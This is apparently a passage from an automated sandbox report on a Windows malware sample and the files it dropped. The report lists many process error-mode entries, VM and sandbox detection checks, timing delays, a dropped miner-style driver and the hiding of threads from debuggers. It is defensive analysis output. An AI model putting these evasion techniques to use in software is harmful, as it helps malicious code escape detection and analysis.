                  Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Query firmware table information (likely to detect VMs)Show sources
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeSystem information queried: FirmwareTableInformation
                  Tries to detect sandboxes / dynamic malware analysis system (registry check)Show sources
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Tries to detect virtualization through RDTSC time measurementsShow sources
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeRDTSC instruction interceptor: First address: 0000000000C2B6D7 second address: 0000000000C2B6E3 instructions: 0x00000000 rdtsc 0x00000002 movzx edx, ax 0x00000005 bts edx, edx 0x00000008 xor bl, cl 0x0000000a rcl dl, cl 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWindow / User API: threadDelayed 2039
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWindow / User API: threadDelayed 6722
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sysJump to dropped file
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exe TID: 6776Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exe TID: 6760Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe TID: 5868Thread sleep time: -56000s >= -30000s
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exe TID: 68Thread sleep time: -13835058055282155s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\evs.exe TID: 6376Thread sleep count: 256 > 30
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe TID: 5144Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exe TID: 5312Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5200Thread sleep count: 293 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5232Thread sleep count: 74 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5200Thread sleep count: 143 > 30
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_004062F0 FindFirstFileA,FindClose,
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_00402765 FindFirstFileA,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008B7AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
                  Source: nulhfhsi.exe, 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmpBinary or memory string: VMware
                  Source: nulhfhsi.exe, 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareYK1H39RCWin32_VideoControllerL119UEN9VideoController120060621000000.000000-0009.651068display.infMSBDAN6M7_V_6PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsSBCU13XE~
                  Source: nulhfhsi.exe, 00000004.00000003.266096274.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.269731993.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295282731.0000000001840000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: cpu.exe, 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW i(
                  Source: cpu.exe, 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                  Source: nulhfhsi.exeBinary or memory string: VMWare
                  Source: nulhfhsi.exe, 00000004.00000003.266305328.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.270040441.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295918673.0000000001840000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: nulhfhsi.exe, 00000004.00000003.266384514.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.269413903.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295086735.0000000001840000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
                  Source: nulhfhsi.exe, 00000004.00000003.266436615.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.269511334.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295168811.0000000001840000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
                  Source: nulhfhsi.exe, 00000004.00000003.266199641.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.269927378.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295820103.0000000001840000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__
                  Source: nulhfhsi.exe, 00000004.00000002.460328146.00000000016D6000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: nulhfhsi.exe, 00000004.00000002.503459155.0000000006A56000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: lxoqz3o0.exe, 00000006.00000003.295501465.0000000000DC4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll))
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeSystem information queried: ModuleInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess information queried: ProcessInformation

                  Anti Debugging:

                  barindex
                  Hides threads from debuggersShow sources
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeThread information set: HideFromDebugger
